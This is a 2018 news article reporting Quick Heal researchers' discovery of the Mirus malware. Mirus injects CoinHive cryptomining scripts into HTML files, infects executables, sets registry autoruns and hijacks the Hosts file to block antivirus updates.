Info-tech

MIRUS malware infects html files with CoinHive scripts: Quick Heal

Prabha Kylas March 5 | Updated on March 07, 2018

Sanjay Katkar, Chief Technology Officer, Quick Heal Technologies

Researchers at Quick Heal Security Labs have reported a crytomining malware that injects CoinHive JavaScript into html files while also injecting virus in files with *.exe, *.com, *.scr and *.pif extensions.

A researcher pointed out that Mirus malware is the latest technique that uses CoinHive cryptomining script as payload.

In this case, malware authors seem to capitalise on scripts such as CoinHive to consume compute power of visitors’ machines for mining crypto-currencies like Monero.

The research team detected that in February, there were 20,000 instances per day of cryptomining malware activity in infected systems.

"The rising popularity of cryptocurrencies has attracted cybercriminals towards cryptocurrency mining. More and more hacking groups have diverted their attention in creating malware that can use the resources of infected endpoints to mine cryptocurrency.

"This trend will keep growing looking at the interest cryptocurrencies are generating globally and the crazy valuations they are trading at," said Sanjay Katkar, Joint Managing Director and CTO, Quick Heal Technologies Ltd.

The malware spotted by Quick Heal also injects the script into html file making it possible to “consistently run” it on the infected system. When the user runs the html file, the mining begins and stops when the html page is closed. While running, the script takes up 100 per cent of CPU usage for mining.

The malware also modifies registry entries with two lines of code which executes everytime the system starts. Registry in windows is a database that stores configuration settings of all applications, Windows settings, user passwords, details on device drives among other data.

The report also notes that the virus hijacks Windows Hosts file, which overrides DNS domain of particular computer. As a result, websites of anti-virus programmes may become inaccessible and some antivirus software may not receive updates.

Quick Heal’s threat report 2018 identifies around 10 million crytocurrency mining scripts and 14 million hits of cryptocurrency miners on customers’ systems in 2017. The report calls out Javascript as one of the widely used script formats.

Updates: The average cryptomining scripts activity per day as observed by the firm and CTO's response have been added.

Published on March 05, 2018

Follow us on Telegram, Facebook, Twitter, Instagram, YouTube and Linkedin. You can also download our Android App or IOS App.

This article is closed for comments.
Please Email the Editor

You May Also Like